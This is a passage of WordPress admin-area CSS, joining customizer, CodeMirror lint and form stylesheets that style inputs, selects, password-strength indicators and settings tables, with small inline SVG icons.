15px;box-sizing:border-box}#available-menu-items-search input,#available-widgets-filter input{width:100%;min-height:40px;margin:1px 0;padding:0 30px}#available-menu-items-search input::-ms-clear,#available-widgets-filter input::-ms-clear{display:none}#available-menu-items-search .search-icon,#available-widgets-filter .search-icon{display:block;position:absolute;bottom:19px;left:16px;width:30px;height:30px;line-height:2.1;text-align:center;color:#646970}#available-menu-items-search .accordion-section-title .clear-results,#available-widgets-filter .clear-results{position:absolute;top:40px;right:16px;width:30px;height:30px;padding:0;border:0;cursor:pointer;background:0 0;color:#d63638;text-decoration:none;outline:0}#available-menu-items-search .clear-results,#available-menu-items-search.loading .clear-results.is-visible,#available-widgets-filter .clear-results{display:none}#available-menu-items-search .clear-results.is-visible,#available-widgets-filter .clear-results.is-visible{display:block}#available-menu-items-search .clear-results:before,#available-widgets-filter .clear-results:before{content:"\f335";content:"\f335"/'';font:normal 20px/1 dashicons;vertical-align:middle;-webkit-font-smoothing:antialiased;-moz-osx-font-smoothing:grayscale}#available-menu-items-search .clear-results:focus,#available-menu-items-search .clear-results:hover,#available-widgets-filter .clear-results:focus,#available-widgets-filter .clear-results:hover{color:#d63638}#available-menu-items-search .clear-results:focus,#available-widgets-filter .clear-results:focus{border-radius:2px;box-shadow:0 0 0 var(--wp-admin-border-width-focus,1.5px) var(--wp-admin-theme-color,#3858e9);outline:2px solid transparent}#available-menu-items-search .search-icon:after,#available-widgets-filter .search-icon:after,.themes-filter-bar .search-icon:after{content:"\f179";font:normal 20px/1 dashicons;vertical-align:middle;-webkit-font-smoothing:antialiased;-moz-osx-font-smoothing:grayscale}.themes-filter-bar .search-icon{position:absolute;top:2px;left:2px;z-index:1;color:#646970;height:30px;width:30px;line-height:2;text-align:center}.no-widgets-found-message{display:none;margin:0;padding:0 15px;line-height:inherit}.no-widgets-found .no-widgets-found-message{display:block}#available-menu-items .item-top,#available-menu-items .item-top:hover,#available-widgets .widget-top,#available-widgets .widget-top:hover{border:none;background:0 0;box-shadow:none}#available-menu-items .item-tpl,#available-widgets .widget-tpl{position:relative;padding:15px 15px 15px 60px;background:#fff;border-bottom:1px solid #dcdcde;border-left:4px solid #fff;transition:.15s color ease-in-out,.15s background-color ease-in-out,.15s border-color ease-in-out;cursor:pointer;display:none}#available-menu-items .item,#available-widgets .widget{position:static}.customize-controls-preview-toggle{display:none}@media only screen and (max-width:782px){.wp-customizer .theme:not(.active):focus .theme-actions,.wp-customizer .theme:not(.active):hover .theme-actions{display:block}.wp-customizer .theme-browser .theme.active .theme-name span{display:inline}.customize-control-header button.random .dice{margin-top:0}.customize-control-checkbox .customize-inside-control-row,.customize-control-nav_menu_auto_add .customize-inside-control-row,.customize-control-radio .customize-inside-control-row{margin-left:32px}.customize-control-checkbox input,.customize-control-nav_menu_auto_add input,.customize-control-radio input{margin-left:-32px}.customize-control input[type=checkbox]+label+br,.customize-control input[type=radio]+label+br{line-height:2.5}.customize-control .date-time-fields select{height:39px}.date-time-fields .date-input.month{width:79px}.date-time-fields .date-input.day,.date-time-fields .date-input.hour,.date-time-fields .date-input.minute{width:55px}.date-time-fields .date-input.year{width:80px}#customize-control-changeset_preview_link a{bottom:16px}.media-widget-control .media-widget-buttons .button.change-media,.media-widget-control .media-widget-buttons .button.edit-media,.media-widget-control .media-widget-buttons .button.select-media{margin-top:12px}.customize-preview-header.themes-filter-bar .search-icon{top:6px}}@media screen and (max-width:1200px){.adding-menu-items .wp-full-overlay.expanded.preview-mobile .wp-full-overlay-main,.adding-widget .wp-full-overlay.expanded.preview-mobile .wp-full-overlay-main,.outer-section-open .wp-full-overlay.expanded.preview-mobile .wp-full-overlay-main{left:67%}}@media screen and (max-width:640px){.wp-full-overlay.collapsed #customize-controls{margin-left:0}.wp-full-overlay-sidebar .wp-full-overlay-sidebar-content{bottom:0}.customize-controls-preview-toggle{display:block;position:absolute;top:0;left:48px;line-height:2.6;font-size:14px;padding:0 12px 4px;margin:0;height:45px;background:#f0f0f1;border:0;border-right:1px solid #dcdcde;border-top:4px solid #f0f0f1;color:#50575e;cursor:pointer;transition:color .1s ease-in-out,background .1s ease-in-out}#customize-footer-actions,.customize-controls-preview-toggle .controls,.preview-only .customize-controls-preview-toggle .preview,.preview-only .wp-full-overlay-sidebar-content{display:none}.preview-only #customize-save-button-wrapper{margin-top:-46px}.customize-controls-preview-toggle .controls:before,.customize-controls-preview-toggle .preview:before{font:normal 20px/1 dashicons;content:"\f177";content:"\f177"/'';position:relative;top:4px;margin-right:6px}.customize-controls-preview-toggle .controls:before{content:"\f540";content:"\f540"/''}.preview-only #customize-controls{height:45px}.preview-only #customize-preview,.preview-only .customize-controls-preview-toggle .controls{display:block}.wp-core-ui.wp-customizer .button{padding:0 14px;line-height:2.14285714;font-size:14px;vertical-align:middle}.customize-control .attachment-media-view .upload-button{text-align:center}#customize-control-changeset_status .customize-inside-control-row{padding-top:15px}body.adding-menu-items div#available-menu-items,body.adding-widget div#available-widgets,body.outer-section-open div#customize-sidebar-outer-content{width:100%}#available-menu-items .customize-section-title,#available-widgets .customize-section-title{border:0;clip-path:none;height:inherit;margin:0;overflow:hidden;padding:0;width:auto;position:static}#available-menu-items .customize-section-title button,#available-widgets .customize-section-title button{display:block}#available-menu-items .customize-section-back,#available-widgets .customize-section-back{height:69px}#available-menu-items .customize-section-title h3,#available-widgets .customize-section-title h3{font-size:20px;font-weight:200;padding:9px 10px 12px 14px;margin:0;line-height:24px;color:#50575e;display:block;overflow:hidden;white-space:nowrap;text-overflow:ellipsis}#available-menu-items .customize-section-title .customize-action,#available-widgets .customize-section-title .customize-action{font-size:13px;display:block;font-weight:400;overflow:hidden;white-space:nowrap;text-overflow:ellipsis}#available-widgets-filter{position:relative;width:100%;height:auto}#available-widgets-list{top:152px}#available-menu-items-search .clear-results{top:40px;right:16px}.reorder,.reordering .reorder-done{padding:8px}}@media screen and (max-width:600px){.wp-full-overlay.expanded{margin-left:0}body.adding-menu-items div#available-menu-items,body.adding-widget div#available-widgets,body.outer-section-open div#customize-sidebar-outer-content{top:46px;z-index:10}body.wp-customizer .wp-full-overlay.expanded #customize-sidebar-outer-content{left:-100%}body.wp-customizer.outer-section-open .wp-full-overlay.expanded #customize-sidebar-outer-content{left:0}}/*! This file is auto-generated */ .wp-core-ui [class*=CodeMirror-lint-message],.wrap .CodeMirror-lint-marker-multiple,.wrap [class*=CodeMirror-lint-marker]{background-image:none}.wp-core-ui .CodeMirror-lint-marker-error,.wp-core-ui .CodeMirror-lint-marker-warning{cursor:help}.wrap .CodeMirror-lint-marker-multiple{position:absolute;top:0}.wrap [class*=CodeMirror-lint-marker]:before{font:normal 18px/1 dashicons;position:relative;top:-2px}.wp-core-ui [class*=CodeMirror-lint-message]:before{font:normal 16px/1 dashicons;left:16px;position:absolute}.wp-core-ui .CodeMirror-lint-message-error,.wp-core-ui .CodeMirror-lint-message-warning{box-shadow:0 1px 1px 0 rgba(0,0,0,.1);margin:5px 0 2px;padding:3px 12px 3px 28px}.wp-core-ui .CodeMirror-lint-message-warning{background-color:#fcf9e8;border-left:4px solid #dba617}.wp-core-ui .CodeMirror-lint-message-warning:before,.wrap .CodeMirror-lint-marker-warning:before{content:"\f534";color:#dba617}.wp-core-ui .CodeMirror-lint-message-error{background-color:#fcf0f1;border-left:4px solid #d63638}.wp-core-ui .CodeMirror-lint-message-error:before,.wrap .CodeMirror-lint-marker-error:before{content:"\f153";color:#d63638}.wp-core-ui .CodeMirror-lint-tooltip{background:0 0;border:none;border-radius:0;direction:ltr}.wrap .CodeMirror .CodeMirror-matchingbracket{background:rgba(219,166,23,.3);color:inherit}.CodeMirror{text-align:left}.wrap .CodeMirror .CodeMirror-linenumber{color:#646970}/*! This file is auto-generated */ @import url(common-rtl.min.css); @import url(forms-rtl.min.css); @import url(admin-menu-rtl.min.css); @import url(dashboard-rtl.min.css); @import url(list-tables-rtl.min.css); @import url(edit-rtl.min.css); @import url(revisions-rtl.min.css); @import url(media-rtl.min.css); @import url(themes-rtl.min.css); @import url(about-rtl.min.css); @import url(nav-menus-rtl.min.css); @import url(widgets-rtl.min.css); @import url(site-icon-rtl.min.css); @import url(l10n-rtl.min.css); @import url(site-health-rtl.min.css); @media (prefers-reduced-motion: no-preference) { @view-transition { navigation: auto; } #adminmenu > .menu-top { view-transition-name: attr(id type(<custom-ident>), none); } } /* Include margin and padding in the width calculation of input and textarea. */ input, select, textarea, button { box-sizing: border-box; font-family: inherit; font-size: inherit; font-weight: inherit; } textarea, input { font-size: 14px; } textarea { overflow: auto; padding: 8px 12px; /* inherits font size 14px */ line-height: 1.42857143; /* 20px */ resize: vertical; } input, select { margin: 0 1px; } textarea.code { padding: 8px 12px; } input[type="text"], input[type="password"], input[type="color"], input[type="date"], input[type="datetime"], input[type="datetime-local"], input[type="email"], input[type="month"], input[type="number"], input[type="search"], input[type="tel"], input[type="time"], input[type="url"], input[type="week"], select, textarea { box-shadow: 0 0 0 transparent; border-radius: 2px; border: 1px solid #949494; background-color: #fff; color: #1e1e1e; } input[type="text"], input[type="password"], input[type="date"], input[type="datetime"], input[type="datetime-local"], input[type="email"], input[type="month"], input[type="number"], input[type="search"], input[type="tel"], input[type="time"], input[type="url"], input[type="week"] { padding: 0 12px; /* inherits font size 14px */ min-height: 40px; } select { padding: 0 24px 0 12px; /* inherits font size 14px */ line-height: 2.71428571; /* 38px for 40px min-height */ min-height: 40px; } ::-webkit-datetime-edit { /* inherits font size 14px */ line-height: 1.85714286; /* 26px */ } input[type="text"]:focus, input[type="password"]:focus, input[type="color"]:focus, input[type="date"]:focus, input[type="datetime"]:focus, input[type="datetime-local"]:focus, input[type="email"]:focus, input[type="month"]:focus, input[type="number"]:focus, input[type="search"]:focus, input[type="tel"]:focus, input[type="time"]:focus, input[type="url"]:focus, input[type="week"]:focus, select:focus, textarea:focus { border-color: var(--wp-admin-theme-color); box-shadow: 0 0 0 var(--wp-admin-border-width-focus, 1.5px) var(--wp-admin-theme-color); /* Only visible in Windows High Contrast mode */ outline: 2px solid transparent; } /* Checkbox and radio use outset focus style */ input[type="checkbox"]:focus, input[type="radio"]:focus { border-color: #1e1e1e; box-shadow: 0 0 0 2px #fff, 0 0 0 4px var(--wp-admin-theme-color); /* Only visible in Windows High Contrast mode */ outline: 2px solid transparent; } /* rtl:ignore */ .ltr, input[type="password"], input[type="email"], input[type="url"] { direction: ltr; } input[type="checkbox"], input[type="radio"] { border: 1px solid #1e1e1e; border-radius: 2px; background: #fff; color: #1e1e1e; clear: none; cursor: pointer; display: inline-block; line-height: 0; height: 1rem; margin: -0.25rem 0.25rem 0 0; outline: 0; padding: 0 !important; text-align: center; vertical-align: middle; width: 1rem; min-width: 1rem; -webkit-appearance: none; box-shadow: none; transition: .05s border-color ease-in-out; } input[type="radio"]:checked + label:before { color: #949494; } .wp-core-ui input[type="reset"]:hover, .wp-core-ui input[type="reset"]:active { color: #135e96; } td > input[type="checkbox"], .wp-admin p input[type="checkbox"], .wp-admin p input[type="radio"] { margin-top: 0; } .wp-admin p label input[type="checkbox"] { margin-top: -4px; } .wp-admin p label input[type="radio"] { margin-top: -2px; } input[type="radio"] { display: inline-flex; border-radius: 50%; margin-right: 0.25rem; align-items: center; justify-content: center; } input[type="checkbox"]:checked::before, input[type="radio"]:checked::before { float: left; display: inline-block; vertical-align: middle; width: 1rem; -webkit-font-smoothing: antialiased; -moz-osx-font-smoothing: grayscale; } input[type="checkbox"]:checked::before { /* Use the "Yes" SVG Dashicon */ content: url("data:image/svg+xml;utf8,%3Csvg%20xmlns%3D%27http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%27%20viewBox%3D%270%200%2020%2020%27%3E%3Cpath%20d%3D%27M14.83%204.89l1.34.94-5.81%208.38H9.02L5.78%209.67l1.34-1.25%202.57%202.4z%27%20fill%3D%27%23ffffff%27%2F%3E%3C%2Fsvg%3E"); content: url("data:image/svg+xml;utf8,%3Csvg%20xmlns%3D%27http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%27%20viewBox%3D%270%200%2020%2020%27%3E%3Cpath%20d%3D%27M14.83%204.89l1.34.94-5.81%208.38H9.02L5.78%209.67l1.34-1.25%202.57%202.4z%27%20fill%3D%27%23ffffff%27%2F%3E%3C%2Fsvg%3E") / ''; margin: -0.1875rem 0 0 -0.25rem; height: 1.3125rem; width: 1.3125rem; } input[type="checkbox"]:checked { background: var(--wp-admin-theme-color); border-color: var(--wp-admin-theme-color); } input[type="radio"]:checked { background: var(--wp-admin-theme-color); border-color: var(--wp-admin-theme-color); } input[type="radio"]:checked::before { content: ""; border-radius: 50%; width: 0.5rem; /* 8px */ height: 0.5rem; /* 8px */ margin: auto; background-color: #fff; /* Only visible in Windows High Contrast mode */ outline: 4px solid transparent; } @-moz-document url-prefix() { input[type="checkbox"], input[type="radio"], .form-table input.tog { margin-bottom: -1px; } } /* Search */ input[type="search"] { -webkit-appearance: textfield; } input[type="search"]::-webkit-search-decoration { display: none; } input[type="search"]::-webkit-search-cancel-button { cursor: pointer; } .wp-admin input[type="file"] { padding: 3px 0; cursor: pointer; } input.readonly, input[readonly], textarea.readonly, textarea[readonly] { background-color: #f0f0f0; } ::-webkit-input-placeholder { color: #757575; } ::-moz-placeholder { color: #757575; } .form-invalid .form-required, .form-invalid .form-required:focus, .form-invalid.form-required input, .form-invalid.form-required input:focus, .form-invalid.form-required select, .form-invalid.form-required select:focus { border-color: #d63638 !important; box-shadow: 0 0 2px rgba(214, 54, 56, 0.8); } .form-table .form-required.form-invalid td:after { content: "\f534"; content: "\f534" / ''; font: normal 20px/1 dashicons; color: #d63638; margin-left: -25px; vertical-align: middle; } /* Adjust error indicator for password layout */ .form-table .form-required.user-pass1-wrap.form-invalid td:after { content: ""; } .form-table .form-required.user-pass1-wrap.form-invalid .password-input-wrapper:after { content: "\f534"; content: "\f534" / ''; font: normal 20px/1 dashicons; color: #d63638; margin: 0 6px 0 -29px; vertical-align: middle; } .form-input-tip { color: #646970; } input:disabled, input.disabled, select:disabled, select.disabled, textarea:disabled, textarea.disabled { background: #f0f0f0; border-color: #cccccc; box-shadow: none; color: #949494; } input[type="file"]:disabled, input[type="file"].disabled, input[type="file"][aria-disabled="true"], input[type="range"]:disabled, input[type="range"].disabled, input[type="range"][aria-disabled="true"] { background: none; box-shadow: none; cursor: default; } input[type="checkbox"]:disabled, input[type="checkbox"].disabled, input[type="checkbox"][aria-disabled="true"], input[type="radio"]:disabled, input[type="radio"].disabled, input[type="radio"][aria-disabled="true"], input[type="checkbox"]:disabled:checked:before, input[type="checkbox"].disabled:checked:before, input[type="radio"]:disabled:checked:before, input[type="radio"].disabled:checked:before { opacity: 0.7; cursor: default; } /*------------------------------------------------------------------------------ 2.0 - Forms ------------------------------------------------------------------------------*/ /* Select styles are based on the default button in buttons.css */ .wp-core-ui select { font-size: 14px; line-height: 2.71428571; /* 38px for 40px min-height */ color: #1e1e1e; border-color: #949494; box-shadow: none; border-radius: 2px; padding: 0 24px 0 12px; min-height: 40px; max-width: 25rem; -webkit-appearance: none; /* The SVG is arrow-down-alt2 from Dashicons. */ background: #fff url('data:image/svg+xml;charset=US-ASCII,%3Csvg%20width%3D%2220%22%20height%3D%2220%22%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%3E%3Cpath%20d%3D%22M5%206l5%205%205-5%202%201-7%207-7-7%202-1z%22%20fill%3D%22%231e1e1e%22%2F%3E%3C%2Fsvg%3E') no-repeat right 8px top 55%; background-size: 16px 16px; cursor: pointer; vertical-align: middle; } .wp-core-ui select:hover { color: #1e1e1e; border-color: #1e1e1e; } .wp-core-ui select:focus { border-color: var(--wp-admin-theme-color); color: #1e1e1e; box-shadow: 0 0 0 var(--wp-admin-border-width-focus, 1.5px) var(--wp-admin-theme-color); } .wp-core-ui select:active { border-color: #949494; box-shadow: none; } .wp-core-ui select.disabled, .wp-core-ui select:disabled { color: #a7aaad; border-color: #dcdcde; background-color: #f6f7f7; /* The SVG is arrow-down-alt2 from Dashicons. */ background-image: url('data:image/svg+xml;charset=US-ASCII,%3Csvg%20width%3D%2220%22%20height%3D%2220%22%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%3E%3Cpath%20d%3D%22M5%206l5%205%205-5%202%201-7%207-7-7%202-1z%22%20fill%3D%22%23a0a5aa%22%2F%3E%3C%2Fsvg%3E'); box-shadow: none; text-shadow: 0 1px 0 #fff; cursor: default; transform: none; } .wp-core-ui select[aria-disabled="true"] { cursor: default; } /* Reset Firefox inner outline that appears on :focus. */ /* This ruleset overrides the color change on :focus thus needs to be after select:focus. */ .wp-core-ui select:-moz-focusring { color: transparent; text-shadow: 0 0 0 #0a4b78; } /* Remove background focus style from IE11 while keeping focus style available on option elements. */ .wp-core-ui select::-ms-value { background: transparent; color: #50575e; } .wp-core-ui select:hover::-ms-value { color: #1e1e1e; } .wp-core-ui select:focus::-ms-value { color: #0a4b78; } .wp-core-ui select.disabled::-ms-value, .wp-core-ui select:disabled::-ms-value { color: #a7aaad; } /* Hide the native down arrow for select element on IE. */ .wp-core-ui select::-ms-expand { display: none; } .wp-admin .button-cancel { display: inline-block; min-height: 28px; padding: 0 5px; line-height: 2; } .meta-box-sortables select { max-width: 100%; } .meta-box-sortables input { vertical-align: middle; } .misc-pub-post-status select { margin-top: 0; } .wp-core-ui select[multiple] { height: auto; padding-right: 8px; background: #fff; } .submit { padding: 1.5em 0; margin: 5px 0; border-bottom-left-radius: 3px; border-bottom-right-radius: 3px; border: none; } form p.submit a.cancel:hover { text-decoration: none; } p.submit { text-align: left; max-width: 100%; margin-top: 20px; padding-top: 10px; } .textright p.submit { border: none; text-align: right; } table.form-table + p.submit, table.form-table + input + p.submit, table.form-table + input + input + p.submit { border-top: none; padding-top: 0; } #minor-publishing-actions input, #major-publishing-actions input, #minor-publishing-actions .preview { text-align: center; } textarea.all-options, input.all-options { width: 250px; } input.large-text, textarea.large-text { width: 99%; } .regular-text { width: 25em; } input.small-text { width: 50px; padding: 0 8px; } label input.small-text { margin-top: -4px; } input[type="number"].small-text { width: 65px; padding-right: 4px; } input.tiny-text { width: 35px; } input[type="number"].tiny-text { width: 45px; padding-right: 0; } #doaction, #doaction2, #post-query-submit { margin: 0 8px 0 0; } /* @since 5.7.0 secondary bulk action controls require JS. */ .no-js label[for="bulk-action-selector-bottom"], .no-js select#bulk-action-selector-bottom, .no-js input#doaction2, .no-js label[for="new_role2"], .no-js select#new_role2, .no-js input#changeit2 { display: none; } .wp-core-ui .tablenav input[type="text"], .wp-core-ui .tablenav input[type="password"], .wp-core-ui .tablenav input[type="date"], .wp-core-ui .tablenav input[type="datetime"], .wp-core-ui .tablenav input[type="datetime-local"], .wp-core-ui .tablenav input[type="email"], .wp-core-ui .tablenav input[type="month"], .wp-core-ui .tablenav input[type="number"], .wp-core-ui .tablenav input[type="search"], .wp-core-ui .tablenav input[type="tel"], .wp-core-ui .tablenav input[type="time"], .wp-core-ui .tablenav input[type="url"], .wp-core-ui .tablenav input[type="week"], .wp-core-ui .tablenav select { padding: 0 12px; /* inherits font size 14px */ line-height: 2.14285714; /* 30px for 32px height with 14px font */ min-height: 32px; } .wp-core-ui .tablenav select { float: left; margin-right: 6px; max-width: 12.5rem; padding: 0 24px 0 8px; } .wp-core-ui .tablenav .button { min-height: 32px; line-height: 2.30769231; /* 30px for 32px height with 13px font */ padding: 0 12px; } #timezone_string option { margin-left: 1em; } .wp-core-ui .button.wp-hide-pw > .dashicons, .wp-core-ui .button.wp-cancel-pw > .dashicons { width: 1.25rem; height: 1.25rem; font-size: 20px; line-height: 1; vertical-align: middle; } .button.wp-hide-pw.user-new-password-toggle { display: inline-flex; align-items: center; column-gap: 4px; } .wp-cancel-pw .dashicons-no { display: none; } label, #your-profile label + a { vertical-align: middle; } fieldset label, #your-profile label + a { vertical-align: middle; } .options-media-php [for*="_size_"] { min-width: 10em; vertical-align: baseline; } .options-media-php .small-text[name*="_size_"] { margin: 0 0 1em; } .wp-generate-pw { margin-top: 1em; position: relative; } .wp-pwd button { height: min-content; } .wp-pwd { margin-top: 1em; position: relative; } .mailserver-pass-wrap .wp-pwd { display: inline-block; margin-top: 0; } /* rtl:ignore */ #mailserver_pass { padding-right: 2.5rem; } /* rtl:ignore */ .mailserver-pass-wrap .button.wp-hide-pw { background: transparent; border: 1px solid transparent; box-shadow: none; font-size: 14px; line-height: 2; width: 2.5rem; min-width: 40px; margin: 0; padding: 0 9px; position: absolute; right: 0; top: 0; } .mailserver-pass-wrap .button.wp-hide-pw:hover { background: transparent; border-color: transparent; } .mailserver-pass-wrap .button.wp-hide-pw:focus { background: transparent; border-color: var(--wp-admin-theme-color); border-radius: 2px; box-shadow: 0 0 0 0.5px var(--wp-admin-theme-color); /* Only visible in Windows High Contrast mode */ outline: 2px solid transparent; } .mailserver-pass-wrap .button.wp-hide-pw:active { background: transparent; box-shadow: none; transform: none; } #misc-publishing-actions label { vertical-align: baseline; } #pass-strength-result { background-color: #f0f0f0; border: 1px solid #cccccc; border-radius: 2px; color: #1e1e1e; margin: -1px 1px 5px; padding: 3px 5px; text-align: center; width: 25em; box-sizing: border-box; opacity: 0; } #pass-strength-result.short { background-color: #ffabaf; border-color: #e65054; opacity: 1; } #pass-strength-result.bad { background-color: #facfd2; border-color: #f86368; opacity: 1; } #pass-strength-result.good { background-color: #f5e6ab; border-color: #f0c33c; opacity: 1; } #pass-strength-result.strong { background-color: #b8e6bf; border-color: #68de7c; opacity: 1; } .password-input-wrapper { display: inline-block; } .password-input-wrapper input { font-family: Consolas, Monaco, monospace; } #pass1.short, #pass1-text.short { border-color: #e65054; } #pass1.bad, #pass1-text.bad { border-color: #f86368; } #pass1.good, #pass1-text.good { border-color: #f0c33c; } #pass1.strong, #pass1-text.strong { border-color: #68de7c; } #pass1:focus, #pass1-text:focus { box-shadow: 0 0 0 0.5px var(--wp-admin-theme-color); /* Only visible in Windows High Contrast mode */ outline: 2px solid transparent; } .pw-weak { display: none; } .indicator-hint { padding-top: 8px; } .wp-pwd [type="text"], .wp-pwd [type="password"] { margin-bottom: 0; /* Same height as the buttons */ min-height: 40px; } /* Hide the Edge "reveal password" native button */ .wp-pwd input::-ms-reveal { display: none; } #pass1-text, .show-password #pass1 { display: none; } #pass1-text::-ms-clear { display: none; } .show-password #pass1-text { display: inline-block; } /* Caps lock warning */ .wp-pwd .caps-warning { display: none; position: relative; background: #fcf9e8; border: 1px solid #f0c33c; color: #1d2327; padding: 6px 10px; top: -8px; } .profile-php .wp-pwd .caps-warning { padding: 3px 5px; top: -4px; border-radius: 2px; } .wp-pwd .caps-icon { display: inline-flex; justify-content: center; width: 20px; height: 20px; margin-right: 5px; vertical-align: middle; } .wp-pwd .caps-warning-text { vertical-align: middle; } /* Caps lock warning */ p.search-box { display: flex; flex-wrap: wrap; align-items: center; column-gap: 0.5rem; position: relative; float: right; margin: 11px 0; } p.search-box input[type="search"], p.search-box input[type="text"] { min-height: 32px; padding: 0 8px; } p.search-box .button { min-height: 32px; line-height: 2.30769231; /* 30px for 32px height with 13px font */ padding: 0 12px; } .network-admin.themes-php p.search-box { clear: left; } .tablenav .search-plugins input[name="s"] { float: left; margin: 0 4px 0 0; } .tagsdiv .newtag { margin: 0; } .js.plugins-php .search-box .wp-filter-search { margin: 0; width: 280px; } input[type="text"].ui-autocomplete-loading, input[type="email"].ui-autocomplete-loading { background-image: url(../images/loading.gif); background-repeat: no-repeat; background-position: right 5px center; visibility: visible; } input.ui-autocomplete-input.open { border-bottom-color: transparent; } ul#add-to-blog-users { margin: 0 0 0 14px; } .ui-autocomplete { padding: 0; margin: 0; list-style: none; position: absolute; z-index: 10000; border: 1px solid #4f94d4; box-shadow: 0 1px 2px rgba(79, 148, 212, 0.8); background-color: #fff; } .ui-autocomplete li { margin-bottom: 0; padding: 4px 10px; white-space: nowrap; text-align: left; cursor: pointer; } /* Colors for the wplink toolbar autocomplete. */ .ui-autocomplete .ui-state-focus { background-color: #dcdcde; } /* Colors for the tags autocomplete. */ .wp-tags-autocomplete .ui-state-focus, .wp-tags-autocomplete [aria-selected="true"] { background-color: var(--wp-admin-theme-color); color: #fff; /* Only visible in Windows High Contrast mode */ outline: 2px solid transparent; } /*------------------------------------------------------------------------------ 15.0 - Comments Screen ------------------------------------------------------------------------------*/ .form-table { border-collapse: collapse; margin-top: 0.5em; width: 100%; clear: both; } .form-table, .form-table td, .form-table th, .form-table td p { font-size: 14px; } .form-table td { margin-bottom: 9px; padding: 15px 10px; line-height: 1.3; vertical-align: middle; } .form-table th, .form-wrap label { color: #1d2327; font-weight: 400; text-shadow: none; vertical-align: baseline; } .form-table th { vertical-align: top; text-align: left; padding: 20px 10px 20px 0; width: 200px; line-height: 1.3; font-weight: 600; } .form-table th.th-full, /* Not used by core. Back-compat for pre-4.8 */ .form-table .td-full { width: auto; padding: 20px 10px 20px 0; font-weight: 400; } .form-table td p { margin-top: 4px; margin-bottom: 0; } .form-table .date-time-doc { margin-top: 1em; } .form-table p.timezone-info { margin: 1em 0; display: flex; flex-direction: column; } #local-time { margin-top: 0.5em; } .form-table td fieldset label { margin: 0.35em 0 0.5em !important; display: inline-block; } .form-table td fieldset p label { margin-top: 0 !important; } .form-table td fieldset label, .form-table td fieldset p, .form-table td fieldset li { line-height: 1.4; } .form-table .pre { padding: 8px; margin: 0; } table.form-table td .updated { font-size: 13px; } table.form-table td .updated p { font-size: 13px; margin: 0.3em 0; } /*------------------------------------------------------------------------------ 18.0 - Users ------------------------------------------------------------------------------*/ #profile-page .form-table textarea { width: 500px; margin-bottom: 6px; } #profile-page .form-table #rich_editing { margin-right: 5px } #your-profile legend { font-size: 22px; } #display_name { width: 15em; } #adduser .form-field input, #createuser .form-field input { width: 25em; } .color-option { display: inline-block; width: 24%; padding: 5px 15px 15px; box-sizing: border-box; margin-bottom: 3px; } .color-option:hover, .color-option.selected { background: #dcdcde; } .color-palette { display: table; width: 100%; border-spacing: 0; border-collapse: collapse; } .color-palette .color-palette-shade, .color-palette td { display: table-cell; height: 20px; padding: 0; border: none; } .color-option { cursor: pointer; } .create-application-password .form-field { max-width: 25em; } .create-application-password label { font-weight: 600; } .create-application-password p.submit { margin-bottom: 0; padding-bottom: 0; display: block; } #application-passwords-section .notice { margin-top: 20px; margin-bottom: 0; word-wrap: break-word; } .application-password-display input.code { margin-bottom: 6px; width: 100%; max-width: 20em; } .auth-app-card.card { max-width: 768px; } .authorize-application-php .form-wrap p { display: block; } /*------------------------------------------------------------------------------ 19.0 - Tools ------------------------------------------------------------------------------*/ .tool-box .title { margin: 8px 0; font-size: 18px; font-weight: 400; line-height: 24px; } .label-responsive { vertical-align: middle; } #export-filters p { margin: 0 0 1em; } #export-filters p.submit { margin: 7px 0 5px; } /* Card styles */ .card { position: relative; margin-top: 20px; padding: 16px 24px; min-width: 255px; max-width: 520px; border: 1px solid rgb(0, 0, 0, 0.1); border-radius: 8px; background: #ffffff; box-sizing: border-box; } /* Press this styles */ .pressthis h4 { margin: 2em 0 1em; } .pressthis textarea { width: 100%; font-size: 1em; } #pressthis-code-wrap { overflow: auto; } .pressthis-bookmarklet-wrapper { margin: 20px 0 8px; vertical-align: top; position: relative; z-index: 1; } .pressthis-bookmarklet, .pressthis-bookmarklet:hover, .pressthis-bookmarklet:focus, .pressthis-bookmarklet:active { display: inline-block; position: relative; cursor: move; color: #2c3338; background: #dcdcde; border-radius: 5px; border: 1px solid #c3c4c7; font-style: normal; line-height: 16px; font-size: 14px; text-decoration: none; } .pressthis-bookmarklet:active { outline: none; } .pressthis-bookmarklet:after { content: ""; width: 70%; height: 55%; z-index: -1; position: absolute; right: 10px; bottom: 9px; background: transparent; transform: skew(20deg) rotate(6deg); box-shadow: 0 10px 8px rgba(0, 0, 0, 0.6); } .pressthis-bookmarklet:hover:after { transform: skew(20deg) rotate(9deg); box-shadow: 0 10px 8px rgba(0, 0, 0, 0.7); } .pressthis-bookmarklet span { display: inline-block; margin: 0; padding: 0 12px 8px 9px; } .pressthis-bookmarklet span:before { color: #787c82; font: normal 20px/1 dashicons; content: "\f157"; content: "\f157" / ''; position: relative; display: inline-block; top: 4px; margin-right: 4px; } .pressthis-js-toggle { margin-left: 10px; padding: 0; height: auto; vertical-align: top; } /* to override the button class being applied */ .pressthis-js-toggle.button.button { margin-left: 10px; padding: 0; height: auto; vertical-align: top; } .pressthis-js-toggle .dashicons { margin: 5px 8px 6px 7px; color: #50575e; } /*------------------------------------------------------------------------------ 20.0 - Settings ------------------------------------------------------------------------------*/ .timezone-info code { white-space: nowrap; } .defaultavatarpicker .avatar { margin: 2px 0; vertical-align: middle; } .options-general-php .date-time-text { display: inline-block; min-width: 10em; } .options-general-php input.small-text { width: 56px; margin: -2px 0; min-height: 32px; } .options-general-php .spinner { float: none; margin: -3px 3px 0; } .settings-php .language-install-spinner, .options-general-php .language-install-spinner, .user-edit-php .language-install-spinner, .profile-php .language-install-spinner { display: inline-block; float: none; margin: -3px 5px 0; vertical-align: middle; } .form-table.permalink-structure .available-structure-tags { margin-top: 8px; } .form-table.permalink-structure .available-structure-tags ul { display: flex; flex-wrap: wrap; margin: 8px 0 0; } .form-table.permalink-structure .available-structure-tags li { margin: 6px 5px 0 0; } .form-table.permalink-structure .available-structure-tags li:last-child { margin-right: 0; } .form-table.permalink-structure .structure-selection .row { margin-bottom: 16px; } .form-table.permalink-structure .structure-selection .row > div { max-width: calc(100% - 24px); display: inline-flex; flex-direction: column; } .form-table.permalink-structure .structure-selection .row label { font-weight: 600; } .form-table.permalink-structure .structure-selection .row p { margin-top: 0; } .permalink-structure-optional-description code { display: inline-block; } /*------------------------------------------------------------------------------ 21.0 - Network Admin ------------------------------------------------------------------------------*/ .setup-php 